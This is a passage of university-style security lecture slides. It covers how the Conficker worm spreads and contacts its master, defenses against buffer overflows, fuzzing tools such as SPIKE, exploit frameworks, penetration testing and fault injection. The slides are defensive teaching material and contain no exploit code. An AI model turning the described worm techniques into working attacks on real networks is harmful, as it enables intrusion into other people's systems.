       hosts in the same /24 network
     – Random
•   Other infection vectors
     – Executes through ADMIN$ share on computers visible to NetBIOS
           • Dictionary attack if password protected
     – Places copies of self on removeable drives (e.g. USB drives), loads new victim when
       inserted through AUTORUN
                       Conficker : Connectivity
Infected hosts can connect with a “master” to down-load new versions
     – Variants A & B :
          • Every day generate a list of 250 randomly generated IP address
          • Eight times a day attempt connections to a service on every one of those IP addresses

     – The randomness is camoflage
     – Defense attempted : identify the IP addresses in these lists that are not already
        “registered”, register them (to take control), plant honeypot

•   Updates on 3/6/09 and 3/17/09 loaded new version that organized infected hosts
    into a botnet
•   On April 1, 2009 the worm will changed behavior, checking into 500 rendezvous
    points selected from pool of 50,000
     – Anticipated that “something” will happen,
     – But nothing new really did
          Hardware supported simple fix
The problem is that attack code is written into the stack
  or heap, and can be executed from there

The idea of tagging memory with r/w/x permissions has
  been around a very long time
NX (No eXecute) bit architecture tags pages
   – called XD (eXecute Disabled) by Intel, XN
     (eXecute Never) in ARM processor

Naturally there are attacks….to turn this feature off!


                                                         117
              Buffer Overflow Defenses
•   Write correct code
•   Use appropriate languages
•   Use tools to analyze problems
•   Address Space Randomization
•   Make buffers non-executable
     – Should never need to execute code on the stack or
       on the heap




                                                      118
               Writing Correct Code
• Simple solution, but expensive!
   – Performance vs. correctness
   – Software industry practices
• Automatic source-code analysis (limited scope)
   – Super greps like RATS and FlawFinder
   – Embedded compiler analysis
• Audit teams, code review




                                                   119
             Programming Languages
• Languages that are type-safe and enforce bound
  checks
   – E.g., Java, ML, Smalltalk
   – Perl and Taint-mode
• Subsections of language and/or code standards
   – C++ using only smart pointers, std::strings, and
     STL containers
   – Managed Code and the Common Runtime Library
     (CRL)


                                                    120
       Tools for Buffer Overflow Protection
• LibSafe
   – http://www.research.avayalabs.com/project/libsafe/
   – Intercept calls to functions with known problems and
     perform extra checks
   – Source is not necessary
• StackGuard and SSP/ProPolice
   – Place “canary” values at key places on stack
   – Terminator (fixed) or random values
   – ProPolice patch to gcc




                                                            121
         Address Space Randomization

• Vary the base stack address with each execution
   – Stack smashing must have absolute address to over write
     function return address
   – Enabled by default in some linuxes (e.g., FC3)
• Wastes some address space
   – Less of an issue once we have 64 bit address space
• Not absolute
   – Try many times and get lucky
Misc.




        123
                        Fuzzing

• A variant of the fault injection model
   – Create “fuzzed” input to cause errors
• ShareFuzz
   – Intercept all getenv() calls to return very, very long
     strings
                More Fuzz - SPIKE

• An input language for creating variant network
  packets
• From WireShark output, make it easy to express new
  packets
  – a_binary(“00 01 02 03”)
    Data: <00 01 02 03>
  – a_block_size_big-endian_word(“Blockname”);
    Data: <00 01 02 03 00 00 00 00>
  – a_block_start(“Blockname”)
    a_binary(“05 06 07 08”)
    Data: <00 01 02 03 00 00 00 00 05 06 07 08>
  – a_block_end(“Blockname”);
    Data: <00 01 02 03 00 00 00 04 05 06 07 08>
             Exploit Frameworks

• Metasploit
   – http://www.metasploit.com/index.html
• Canvas
   – http://www.immunitysec.com
• Core Impact
   – http://www.coresecurity.com/products/coreimpa
     ct/index.php
             Defense Through Attack
• Ethical hacking
   – You too can become a certified ethical hacker
      • http://www.wired.com/news/infostructure/0,1377,6400
        8,00.html
      • http://www.vigilar.com/training/ceh/index.html?gclid=C
        KSSs-_EvIgCFSAeWAodGm7MaQ
• Hip term for
   – Penetration Testing
   – Vulnerability analysis
   – Vulnerability researching
                   Penetration Testing
• Bring in outside team to “attack” system
   – Well-defined rules of engagement, e.g.,
      •   no DOS but social engineering is allowed
      •   Specified target of attack
      •   Cause no permanent damage
      •   Amount of inside knowledge
• Benefits
   – Ability to think outside the box may reveal new
     issues
• Concerns
   – All discovered flaws reported?
   – Probably not systematic
              Vulnerability Research
• Find exploits in deployed software
   – Zero Day exploit – Exploit that is released before fix
     is available
• Ethical issues once exploit is found
   – How soon to reveal exploit after giving vendor
     heads up?
   – Can you protect your customers in the mean time?
            Software Fault Injection

• Hardware fault injection well used and understood
   – Software fault injection still emerging
   – Active research area at CSL
• Identify input areas
   – Generally network, but could also be files,
     environment variables, command line
• Inject bad inputs and see what happens
         Fault Injection Model




                        Fault
                        Injector




              Auditor


Client                             Server

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:8
posted:11/6/2011
language:English
pages:130